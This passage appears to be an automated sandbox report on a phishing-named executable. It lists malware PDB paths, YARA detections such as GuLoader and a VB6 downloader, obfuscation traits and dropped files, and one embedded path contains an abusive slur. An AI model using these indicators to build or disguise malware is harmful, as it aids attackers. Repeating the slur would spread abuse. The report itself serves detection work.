Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb] source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp
Source: Binary string: Pb730.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp
Source: Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: 0rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 00000023.00000003.18300879046.0000015B1A6C2000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: +kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: \P2P\Client\Debug\Client.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: PicoTorrent.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: SKRFM.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp
Source: Binary string: arc\Release\arc.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp
Source: Binary string: DownExecute.pdb source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp
Source: Binary string: \defeat\rtl49.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000023.00000003.18336377296.0000015B1BE9E000.00000004.00000001.sdmp
Source: Binary string: \i386\Driver.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \Minoral.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000023.00000003.18338076360.0000015B1B388000.00000004.00000001.sdmp
Source: Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: msiexec.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp
Source: Binary string: upE:\\WORK\\WORK_PECEPB\\Work_2012 Private\\.*\\Silence_lock_bot\\Silence_lock_bot\\Release\\Silence_lock_bot.pdb source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp
Source: Binary string: 0\wrapper3.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp
Source: Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp
Source: Binary string: module_ls.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.17634386230.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Yara detected Costura Assembly Loader
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18332888598.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18351572125.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18282718286.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18294299849.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.70.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.164.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c22da.163.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.72.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.165.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.70.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.166.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.71.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.71.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c22da.69.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.164.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18300906087.0000015B1A6C6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected MSILLoadEncryptedAssembly
Source: Yara match File source: 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Binary or sample is protected by dotNetProtector
Source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp String found in binary or memory: :#Lowfi:HSTR:MSIL/PvLogiciels.dotNetProtector.AU5n
Source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.18311262453.0000015B1BE1B000.00000004.00000001.sdmp String found in binary or memory: Y#PERSIST:HSTR:MSIL/PvLogiciels.dotNetProtector.AU6
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>x
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
PE file contains an invalid checksum
Source: mpasbase.vdm.35.dr Static PE information: real checksum: 0x329e303 should be:
Source: mpavbase.vdm.35.dr Static PE information: real checksum: 0x354a210 should be:
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00414356 push eax; ret 1_2_004147B5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00404A4A push edx; iretd 1_2_00404A75
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00404252 push eax; iretd 1_2_00404251
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00404A5E push edx; iretd 1_2_00404A75
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00402E00 push edx; iretd 1_2_00402E01
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040562D push edi; iretd 1_2_00405661
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004052C1 pushfd ; retf 1_2_00405307
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004048C4 push edi; iretd 1_2_004048C5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004040D2 push es; ret 1_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004040DE push es; ret 1_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004076EF pushfd ; retf 1_2_004076F3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004068F0 push eax; iretd 1_2_004068FD
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004058F6 push edx; iretd 1_2_004058F9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004082F9 push eax; iretd 1_2_00408305
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00406E91 push ecx; iretd 1_2_00406E9D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00408298 push ebx; iretd 1_2_00408299
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00406C9E push eax; iretd 1_2_00406ED5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00406EBF push eax; iretd 1_2_00406ED5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00403948 push ecx; iretd 1_2_00403949
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040416E push es; ret 1_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00404112 push es; ret 1_2_0040416D
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00405F20 push esi; iretd 1_2_00405F21
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004061CE push esi; iretd 1_2_004061E5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004055CF push edi; iretd 1_2_00405661
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004059E4 push edi; iretd 1_2_004059E5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040638D push 569795EEh; iretd 1_2_004063A5
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00402F9E push esi; iretd 1_2_00402FA1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004059A0 push eax; iretd 1_2_004059A1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004041BB push eax; iretd 1_2_00404251
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004043BB push edx; iretd 1_2_004043C1
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_02222001 push es; iretd 1_2_02221FC0
Binary contains a suspicious time stamp
Source: ConfigSecurityPolicy.exe.41.dr Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]
PE file contains sections with non-standard names
Source: MpCmdRun.exe.41.dr Static PE information: section name: .didat
Source: NisSrv.exe.41.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.41.dr Static PE information: section name: .didat
Source: MpClient.dll.41.dr Static PE information: section name: .didat
Source: MpCommu.dll.41.dr Static PE information: section name: .didat
Source: MpRtp.dll.41.dr Static PE information: section name: .didat
Source: MpSvc.dll.41.dr Static PE information: section name: .didat
Source: ProtectionManagement.dll.41.dr Static PE information: section name: .didat
Source: MpClient.dll0.41.dr Static PE information: section name: .didat

Persistence and Installation Behavior:

barindex
Sample is not signed and drops a device driver
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdDevFlt.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdFilter.sys
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdNisDrv.sys
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavbase.vdm Jump to dropped file
Drops PE files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\uk-UA\mpuxagent.dll.mui Jump to dropped file
